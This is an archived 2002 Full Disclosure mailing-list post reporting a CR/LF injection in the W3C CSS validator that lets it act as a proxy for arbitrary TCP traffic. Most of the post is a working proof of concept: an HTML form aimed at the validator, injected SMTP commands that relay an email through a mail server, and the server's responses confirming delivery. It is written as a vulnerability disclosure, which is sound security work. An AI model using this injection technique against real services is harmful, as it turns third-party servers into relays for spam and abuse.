Full Disclosure mailing list archives
W3C CSS Validator -- Proxying Attack
From: mattmurphy () kc rr com (Matthew Murphy)
Date: Sat, 14 Sep 2002 15:59:51 -0500
Another vulnerability at the W3C, this time the CSS validator. A CR/LF injection can be performed by creating a custom form:

<FORM METHOD="GET" ACTION="http://jigsaw.w3.org/css-validator/validator">
<INPUT TYPE="hidden" NAME="warning" VALUE="1">
<INPUT TYPE="hidden" NAME="profile" VALUE="css2">
Commands: <TEXTAREA STYLE="width:300px;height:300px" NAME="uri" ONDBLCLICK="document.forms[0].submit()"></TEXTAREA>
</FORM>

And filling it in with something like:

[Begin Form]
http://mailserver:25/
HELO 127.0.0.1
MAIL FROM:me@here.com
RCPT TO:you@somewhere.com
DATA
This is a simple message demonstrating the W3 relaying hole
.
QUIT
[End Form]

This results in:

GET /
502 Unknown Command
HELO 127.0.0.1
250 Welcome [138.96.249.65], pleased to meet you
MAIL FROM:me@here.com
250 Sender "me@here.com" OK...
RCPT TO:you@somewhere.com
250 Recipient "you@somewhere.com" OK...
DATA
354 Enter mail, end with "." on a line by itself
This is a simple message demonstrating the W3 relaying hole
.
250 Message accepted for delivery.
QUIT
221 Closing Session

If you relay this properly, the CSS validator will whine about the connection being terminated by the peer (this happens immediately after the SMTP command "QUIT" is sent). There is a 502 error in the logs from "GET /", but that is really unavoidable.

"The reason the mainstream is thought of as a stream is because it is so shallow." - Author Unknown